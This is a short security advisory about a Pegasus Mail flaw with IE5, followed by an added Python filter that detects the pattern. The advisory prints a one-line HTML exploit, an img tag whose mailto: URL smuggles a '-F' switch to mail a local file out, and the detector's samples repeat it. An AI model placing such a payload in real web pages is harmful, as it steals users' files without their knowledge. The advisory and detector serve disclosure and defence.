Pegasus mail file reading vulnerability
------------------------------------------------------------------------

SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the user's hard drive.

DETAILS

Vulnerable systems:
Pegasus Mail v3.12c with IE5.0

When the web page containing the exploit code is viewed using IE5, Pegasus Mail will automatically create a message which has a copy of the file "c:\test.txt" and is addressed to "[EMAIL PROTECTED]", and queue it ready to be sent without any further user intervention. If instead of "[EMAIL PROTECTED]" we have a local user called "hacker", the message won't be queued but just sent immediately.

Exploit code:
<img src="mailto:[EMAIL PROTECTED] -F c:\test.txt">

Temporary Fix:
Don't run Pegasus Mail at the same time as a web browser. This is not a complete solution, as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticeable to the user.

--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
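Added example, not part of the original advisory: a content-filter check that flags the pattern described above, a mailto: URL placed in an attribute the browser loads without a click, or one that carries a switch-like argument such as "-F". The names MailtoAuditor, audit_html, AUTOLOAD_ATTRS and the sample addresses are assumptions made for this sketch.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# (tag, attribute) pairs a browser fetches without a click. Assumed,
# non-exhaustive list chosen for this example.
AUTOLOAD_ATTRS = {("img", "src"), ("iframe", "src"), ("frame", "src"),
                  ("embed", "src"), ("body", "background")}

# Whitespace followed by a dash-prefixed token inside the URL: the shape of
# the "-F <file>" switch in the advisory. Heuristic; may flag odd subjects.
SWITCH_RE = re.compile(r"\s-{1,2}[A-Za-z]")

class MailtoAuditor(HTMLParser):
    """Collects (tag, attribute, reasons) for suspicious mailto: URLs."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # Decode %20 etc. so encoded spaces cannot hide the switch.
            url = unquote(value or "").strip()
            if not url.lower().startswith("mailto:"):
                continue
            reasons = []
            if (tag, name) in AUTOLOAD_ATTRS:
                reasons.append("auto-loaded")
            if SWITCH_RE.search(url):
                reasons.append("switch-like argument")
            if reasons:
                self.findings.append((tag, name, reasons))

def audit_html(html):
    """Return findings for one HTML document given as a string."""
    auditor = MailtoAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample input; the addresses are placeholders.
SAMPLE = r'''
<a href="mailto:support@example.invalid">contact</a>
<img src="mailto:user@example.invalid -F c:\test.txt">
<a href="mailto:user@example.invalid%20-F%20c:\test.txt">mail us</a>
'''
```

An ordinary clickable mailto: link produces no finding; the image tag is reported for both reasons, and the percent-encoded link for the switch alone.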
